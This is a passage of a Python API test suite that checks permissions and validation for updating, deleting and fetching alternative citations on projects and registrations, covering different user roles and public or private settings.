citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_admin_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_admin_public(self):
res, citation = self.request(name="name",
text="text2",
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_admin_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_contrib_public(self):
res, citation = self.request(name="name",
text="text2",
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_non_contrib_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_logged_out_public(self):
res, citation = self.request(name="name",
text="text2",
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_text_logged_out_private(self):
res, citation = self.request(name="name",
text="text2",
public=False,
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
def test_update_citation_repeat_admin_public(self):
res, citation = self.request(name="name2",
text="text2",
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 2)
errors = [error['detail'] for error in res.json['errors']]
assert_in("There is already a citation named 'name2'", errors)
assert_in("Citation matches 'name2'", errors)
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_admin_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
is_admin=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 2)
errors = [error['detail'] for error in res.json['errors']]
assert_in("There is already a citation named 'name2'", errors)
assert_in("Citation matches 'name2'", errors)
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_admin_public(self):
res, citation = self.request(name="name2",
text="text2",
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_admin_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_contrib_public(self):
res, citation = self.request(name="name2",
text="text2",
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_non_contrib_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
is_contrib=False,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_logged_out_public(self):
res, citation = self.request(name="name2",
text="text2",
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_repeat_logged_out_private(self):
res, citation = self.request(name="name2",
text="text2",
public=False,
logged_out=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_admin_public(self):
res, citation = self.request(is_admin=True,
patch=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_admin_private(self):
res, citation = self.request(public=False,
is_admin=True,
patch=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_admin_public(self):
res, citation = self.request(patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_admin_private(self):
res, citation = self.request(public=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_contrib_public(self):
res, citation = self.request(is_contrib=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_non_contrib_private(self):
res, citation = self.request(public=False,
is_contrib=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_logged_out_public(self):
res, citation = self.request(logged_out=True,
patch=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_empty_logged_out_private(self):
res, citation = self.request(public=False,
logged_out=True,
patch=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_admin_public(self):
res, citation = self.request(name="new name",
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'new name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "new name")
def test_update_citation_name_only_admin_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'new name')
assert_equal(res.json['data']['attributes']['text'], 'text')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "new name")
def test_update_citation_name_only_non_admin_public(self):
res, citation = self.request(name="new name",
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_non_admin_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_non_contrib_public(self):
res, citation = self.request(name="new name",
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_non_contrib_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_logged_out_public(self):
res, citation = self.request(name="new name",
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_logged_out_private(self):
res, citation = self.request(name="new name",
public=False,
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_admin_public(self):
res, citation = self.request(text="new text",
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
assert_equal(res.json['data']['attributes']['name'], 'name')
assert_equal(res.json['data']['attributes']['text'], 'new text')
citation.reload()
assert_equal(citation.text, "new text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_admin_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
is_admin=True)
assert_equal(res.status_code, 200)
citation.reload()
assert_equal(res.json['data']['attributes']['name'], 'name')
assert_equal(res.json['data']['attributes']['text'], 'new text')
assert_equal(citation.text, "new text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_admin_public(self):
res, citation = self.request(text="new text",
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_admin_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_contrib_public(self):
res, citation = self.request(text="new text",
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_non_contrib_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_logged_out_public(self):
res, citation = self.request(text="new text",
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_logged_out_private(self):
res, citation = self.request(text="new text",
public=False,
patch=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_admin_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_admin_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "There is already a citation named 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_admin_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_admin_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_contrib_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_non_contrib_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_logged_out_public(self):
res, citation = self.request(name="name2",
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_name_only_repeat_logged_out_private(self):
res, citation = self.request(name="name2",
public=False,
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_admin_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_admin_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 400)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], "Citation matches 'name2'")
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_admin_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_admin_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_contrib_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_non_contrib_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_logged_out_public(self):
res, citation = self.request(text="text2",
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_text_only_repeat_logged_out_private(self):
res, citation = self.request(text="text2",
public=False,
patch=True,
citation2=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
citation.reload()
assert_equal(citation.text, "text")
assert_equal(citation.name, "name")
def test_update_citation_admin_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_admin_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_admin_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_admin_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_non_contrib_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_public_reg(self):
res, citation = self.request(name="test",
text="Citation",
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
def test_update_citation_logged_out_private_reg(self):
res, citation = self.request(name="test",
text="Citation",
public=False,
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(citation.name, "name")
assert_equal(citation.text, "text")
class TestDeleteAlternativeCitations(ApiTestCase):
def request(self, is_admin=False, is_contrib=True, logged_out=False, errors=False, **kwargs):
admin = AuthUserFactory()
if is_admin:
user = admin
elif not logged_out:
user = AuthUserFactory()
kwargs['contrib'] = user if is_contrib else None
project, citation_url = set_up_citation_and_project(admin, for_delete=True, **kwargs)
if not logged_out:
res = self.app.delete_json_api(citation_url, auth=user.auth, expect_errors=errors)
else:
res = self.app.delete_json_api(citation_url, expect_errors=errors)
return res, project
def test_delete_citation_admin_public(self):
res, project = self.request(is_admin=True)
assert_equal(res.status_code, 204)
project.reload()
assert_equal(project.alternative_citations.count(), 0)
def test_delete_citation_admin_private(self):
res, project = self.request(public=False,
is_admin=True)
assert_equal(res.status_code, 204)
project.reload()
assert_equal(project.alternative_citations.count(), 0)
def test_delete_citation_non_admin_public(self):
res, project = self.request(errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_admin_private(self):
res, project = self.request(public=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_public(self):
res, project = self.request(is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_private(self):
res, project = self.request(public=False,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_public(self):
res, project = self.request(logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_private(self):
res, project = self.request(public=False,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_admin_not_found_public(self):
res, project = self.request(is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_admin_not_found_private(self):
res, project = self.request(public=False,
is_admin=True,
bad=True,
errors=True)
assert_equal(res.status_code, 404)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Not found.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_admin_not_found_public(self):
res, project = self.request(bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_admin_not_found_private(self):
res, project = self.request(public=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_not_found_public(self):
res, project = self.request(is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_not_found_private(self):
res, project = self.request(public=False,
is_contrib=False,
bad=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_not_found_public(self):
res, project = self.request(logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_logged_out_not_found_private(self):
res, project = self.request(public=False,
logged_out=True,
bad=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
project.reload()
assert_equal(project.alternative_citations.count(), 1)
def test_delete_citation_admin_public_reg(self):
res, registration = self.request(registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_admin_private_reg(self):
res, registration = self.request(public=False,
registration=True,
is_admin=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_admin_public_reg(self):
res, registration = self.request(registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_admin_private_reg(self):
res, registration = self.request(public=False,
registration=True,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_public_reg(self):
res, registration = self.request(registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_non_contrib_private_reg(self):
res, registration = self.request(public=False,
registration=True,
is_contrib=False,
errors=True)
assert_equal(res.status_code, 403)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'You do not have permission to perform this action.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_logged_out_public_reg(self):
res, registration = self.request(registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(registration.alternative_citations.count(), 1)
def test_delete_citation_logged_out_private_reg(self):
res, registration = self.request(public=False,
registration=True,
logged_out=True,
errors=True)
assert_equal(res.status_code, 401)
assert_equal(len(res.json['errors']), 1)
assert_equal(res.json['errors'][0]['detail'], 'Authentication credentials were not provided.')
assert_equal(registration.alternative_citations.count(), 1)
class TestGetAlternativeCitations(ApiTestCase):
def request(self, is_admin=False, is_contrib=True, logged_out=False, errors=False, **kwargs):
admin = AuthUserFactory()
if is_admin:
user = admin
elif not logged_out:
user = AuthUserFactory()
kwargs['contrib'] = user if is_contrib else None
citation, citation_url = set_up_citation_and_project(admin, **kwargs)
if not logged_out:
res = self.app.get(citation_url, auth=user.auth, expect_errors=errors)
else:
res = self.app.get(citation_url, expect_errors=errors)
return res, citation
def test_get_citation_admin_public(self):
res, citation = self.request(is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_admin_private(self):
res, citation = self.request(public=False,
is_admin=True)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_public(self):
res, citation = self.request()
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
assert_equal(attributes['name'], 'name')
assert_equal(attributes['text'], 'text')
def test_get_citation_non_admin_private(self):
res, citation = self.request(public=False)
assert_equal(res.status_code, 200)
attributes = res.json['data']['attributes']
